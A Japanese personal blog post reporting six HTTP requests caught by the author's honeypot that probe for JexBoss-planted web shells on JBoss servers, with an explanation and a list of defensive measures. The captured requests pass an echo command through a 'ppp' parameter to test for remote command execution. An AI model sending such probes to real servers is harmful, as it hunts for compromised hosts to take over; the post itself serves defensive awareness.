とりあえずブログ

普通のサラリーマンの雑多なブログ

JBossを狙った探索アクセスをキャッチ

JBoss脆弱性を狙ったような探索アクセスが僕のハニーポットにきていましたので、ご紹介します。

アクセス内容

  • 1件目
GET /jexws2/jexsw2.jsp?ppp=echo%20D3c3mb3r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
  • 2件目
GET /jexws3/jexws3.jsp?ppp=echo%20D3c3mb3r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
  • 3件目
GET /jexws4/jexws4.jsp?ppp=echo%20D3c3mb3r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
  • 4件目
GET /jexinv3/jexinv3.jsp?ppp=echo%20D3c3mb3r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
  • 5件目
GET /jexinv4/jexinv4.jsp?ppp=echo%20D3c3mb3r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
  • 6件目
GET /jbossass/jbossass.jsp?ppp=echo%20D3c3mb3r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36

どんな攻撃か

いずれもリクエストにechoコマンド(echo D3c3mb3r)が含まれているので、その結果がレスポンス200で帰ってきた場合に任意のOSコマンドを実行できますので、それで判断しているようです。

実際の攻撃内容はこんな感じ。

f:id:tkm03:20181203223728p:plain (画像引用:JexBoss – JBoss Verify and EXploitation Tool - IoT Security News

めちゃくちゃ簡単に攻撃できちゃいますね。

上記のサイトでは対策として、下記を推奨していますので、JBossを使用されている方は一度ご確認をした方がよさそうです。

  • OS、Webサーバ、アプリケーションなどをアップデートする
  • 管理者権限をセキュアなアクセスにする
  • 特権アカウントのない限定された権限を持つアカウントを使用してサーバを起動する
  • 攻撃された兆候がないかログを確認する
  • 脆弱性のスキャンを実施する

今日はここまでです。

関連記事です。

sec-owl.hatenablog.com